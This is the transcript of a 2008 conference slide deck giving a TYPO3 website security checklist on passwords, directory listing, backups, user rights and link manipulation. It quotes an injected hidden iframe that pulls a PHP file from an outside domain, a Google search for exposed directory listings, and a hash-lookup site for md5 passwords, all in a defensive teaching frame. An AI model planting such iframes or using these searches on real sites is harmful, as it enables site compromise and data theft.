Security Checklist for TYPO3

Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008

TYPO3 has quite a good security history...

but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required

Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...

md5.rednoize.com

md5 Hash Lookup

Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modiﬁedquot; size

Backup Your Data • Regularly (cronjob) • Directories: ﬁleadmin, typo3conf, uploads • Database: mysqldump --opt > ﬁlename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot

also check for www.domain.com/../system/ not being accessible

database.sql

md5.rednoize.com

Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account

FTP Accounts • Only give access to ﬁleadmin/user_upload/...

When crisis strikes...

• „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“

iframe Attacks <iframe src='http:// ccfelomv hk.com/ dl/adv54 2.php' width=1 height=1> </iframe>

Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: conﬁg.linkVars = L(0-4)

Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netﬁelders.de

Questions ?

Security Checklist for TYPO3

by jweiland on Oct 17, 2008

Accessibility

Categories

Tags

Upload Details

Usage Rights

1 Embed 11

Statistics

Security Checklist for TYPO3 — Presentation Transcript